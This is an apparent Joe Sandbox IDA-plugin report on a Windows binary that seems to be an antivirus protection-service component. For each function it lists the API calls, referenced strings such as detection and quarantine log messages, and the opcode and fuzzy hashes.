String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
API String ID: 1021822269-3147033232
Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32 ref: 0000000140001054
GetProcAddress.KERNEL32 ref: 000000014000106C
FreeLibrary.KERNEL32 ref: 000000014000108F
GetProcAddress.KERNEL32 ref: 00000001400010D2
GetProcAddress.KERNEL32 ref: 00000001400010ED
GetProcAddress.KERNEL32 ref: 0000000140001108
GetProcAddress.KERNEL32 ref: 0000000140001123
GetProcAddress.KERNEL32 ref: 000000014000113E
GetProcAddress.KERNEL32 ref: 0000000140001159
GetProcAddress.KERNEL32 ref: 0000000140001174
FreeLibrary.KERNEL32 ref: 0000000140001194
InitializeCriticalSection.KERNEL32 ref: 00000001400011BE

Strings

vseExec, xrefs: 0000000140001130
vseGlobalInit, xrefs: 00000001400010C8
msi.dll, xrefs: 0000000140001042
{7A7E8119-620E-4CEF-BD5F-F748D7B059DA}, xrefs: 0000000140001081
vseGet, xrefs: 000000014000114B
vseInit, xrefs: 00000001400010FA
vseRelease, xrefs: 0000000140001115
MsiLocateComponentW, xrefs: 0000000140001062
vseGlobalRelease, xrefs: 00000001400010DF
vseSet, xrefs: 0000000140001166

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
API String ID: 883923345-381368982
Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700

Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002492
LeaveCriticalSection.KERNEL32 ref: 00000001400024A3
SetEvent.KERNEL32 ref: 00000001400024AD
EnterCriticalSection.KERNEL32 ref: 00000001400024C0
LeaveCriticalSection.KERNEL32 ref: 00000001400024D1
WaitForMultipleObjects.KERNEL32 ref: 00000001400024F1
CloseHandle.KERNEL32 ref: 00000001400024FB
CloseHandle.KERNEL32 ref: 0000000140002505
EnterCriticalSection.KERNEL32 ref: 0000000140002514
SetEvent.KERNEL32 ref: 000000014000255E
ResetEvent.KERNEL32 ref: 000000014000256B
LeaveCriticalSection.KERNEL32 ref: 0000000140002575
GetProcessHeap.KERNEL32 ref: 0000000140002591
HeapFree.KERNEL32 ref: 000000014000259F
GetProcessHeap.KERNEL32 ref: 00000001400025AE
HeapFree.KERNEL32 ref: 00000001400025BC
GetProcessHeap.KERNEL32 ref: 00000001400025CB
HeapFree.KERNEL32 ref: 00000001400025D9
GetProcessHeap.KERNEL32 ref: 00000001400025E8
HeapFree.KERNEL32 ref: 00000001400025F6

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
String ID:
API String ID: 1613947383-0
Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300

Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 000000014000451B
EnterCriticalSection.KERNEL32(?,?,?,0000000140002456), ref: 0000000140004525
GetProcessHeap.KERNEL32 ref: 000000014000454C
HeapFree.KERNEL32 ref: 000000014000455A
SetEvent.KERNEL32 ref: 0000000140004567
ResetEvent.KERNEL32 ref: 0000000140004571
LeaveCriticalSection.KERNEL32 ref: 000000014000457B
CloseHandle.KERNEL32 ref: 000000014000458A
CloseHandle.KERNEL32 ref: 0000000140004599
LeaveCriticalSection.KERNEL32 ref: 00000001400045A3
DeleteCriticalSection.KERNEL32 ref: 00000001400045AD
GetProcessHeap.KERNEL32 ref: 00000001400045D2
HeapFree.KERNEL32 ref: 00000001400045E0
GetProcessHeap.KERNEL32 ref: 00000001400045F5
HeapFree.KERNEL32 ref: 0000000140004603

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304

Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
action, xrefs: 0000000140003020
?, xrefs: 0000000140002FFE

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtInit, xrefs: 0000000140002BA3
vseqrtAdd, xrefs: 0000000140002BD5
vseqrt.dll, xrefs: 0000000140002B7E
vseqrtRelease, xrefs: 0000000140002BBA

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372

Memory Dump Source

Source File: 00000005.00000002.2708844036.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.2708829730.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708861247.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708916382.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2708934776.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
